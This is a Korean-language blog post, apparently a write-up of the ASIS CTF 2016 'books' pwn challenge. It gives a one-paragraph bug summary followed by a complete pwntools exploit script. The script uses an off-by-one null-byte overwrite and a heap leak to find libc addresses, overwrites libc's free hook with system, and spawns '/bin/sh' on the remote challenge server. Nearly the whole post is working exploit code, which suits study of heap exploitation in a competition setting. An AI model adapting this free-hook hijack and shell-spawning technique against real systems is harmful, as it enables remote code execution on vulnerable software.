ASIS CTF 2016 books

Games/CTF 2016. 5. 11. 02:46

버그: BSS 쪽에 힙leak 및 off-by-one 존재.  포인터 하위바이트 NULL 로 덮는것으로 시작해서 다른객체 pointer 조작하고 결과적으로 libc free hook 하이잭해서 쉘 획득.  arbitrary free 버그는 fake 임 -_-


from pwn import *

context.arch = 'amd64' # i386 / arm


r = remote('books.asis-ctf.ir', 13007)

#r = process(['./b00ks'])

raw_input('attach')

# start pwn.


print r.recvuntil('name: ')

r.sendline('A'*32)

print r.recvuntil('> ')


r.sendline('1')

print r.recvuntil('size: ')

r.sendline('224')

print r.recvuntil('chars): ')

payload = ''

payload += 'A'*224

r.sendline(payload)

print r.recvuntil('size: ')

r.sendline('32')

print r.recvuntil('tion: ')

payload = ''

payload += pack(31337) # id

payload += pack(0) # name

payload += pack(0) # desc

payload += pack(0) # desc size

r.sendline(payload)

print r.recvuntil('> ')


# leak

r.sendline('4')

leak = r.recvuntil('> ')

heap_addr = int(leak.split('Author: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')[1].split('\n')[0][::-1].encode('hex'),16)

print hex(heap_addr)


# set target address to leak

r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('1')

print r.recvuntil('tion: ')

payload = ''

payload += pack(31337)  # id

payload += pack(heap_addr+0x30)       # name  

payload += pack(heap_addr-0x20)       # desc tricky!!

payload += pack(100)       # desc size

r.sendline(payload)

print r.recvuntil('> ')


# overwrite off-by-one

r.sendline('5')

print r.recvuntil('name: ')

r.sendline('A'*32)

print r.recvuntil('> ')


# create free small chunk on the heap

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('200')

print r.recvuntil('chars): ')

r.sendline('C'*200)

print r.recvuntil('size: ')

r.sendline('200')

print r.recvuntil('tion: ')

r.sendline('D'*200)

print r.recvuntil('> ')

r.sendline('2') # delete

print r.recvuntil('delete: ')

r.sendline('2') # free small chunk.

print r.recvuntil('> ')


raw_input()


# trigger bug

r.sendline('4')

leak = r.recvuntil('> ')

libc_main_arena = int(leak.split('Name: ')[1].split('\n')[0][::-1].encode('hex'),16)

libc_rwbase = libc_main_arena & 0xFFFFFFFFFFFFF000

libc_base = libc_rwbase - 0x3be000

libc_malloc_hook = libc_main_arena - 0x78

libc_free_hook = libc_main_arena + 0x2258

print hex(libc_free_hook)

print hex(libc_malloc_hook)

print hex(libc_main_arena)

print hex(libc_rwbase)

print hex(libc_base)


# set overwrite target address

r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('31337')

print r.recvuntil('tion: ')

payload = ''

payload += pack(libc_free_hook)   # desc

payload += pack(100)       # desc len  

r.sendline(payload)

print r.recvuntil('> ')


system = libc_base + 0x46640

# overwrite libc_malloc_hook

r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('31337')

print r.recvuntil('tion: ')

payload = ''

payload += pack(system)       # desc

r.sendline(payload)

print r.recvuntil('> ')


# call system("/bin/sh")

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('100')

print r.recvuntil('chars): ')

r.sendline('/bin/sh')

print r.recvuntil('size: ')

r.sendline('-1')


# get shell?

r.interactive()


'Games > CTF' 카테고리의 다른 글

Tokyo Westerns MMA CTF 2016 shadow  (0) 2016.09.05
BKP2016 segsh  (0) 2016.06.24
ASIS CTF 2016 books  (0) 2016.05.11
ASIS CTF 2016 feap  (0) 2016.05.11
PlaidCTF 2016 butterfly  (0) 2016.04.19
PlaidCTF 2016 fixedpoint  (0) 2016.04.19
Posted by daehee87

댓글을 달아 주세요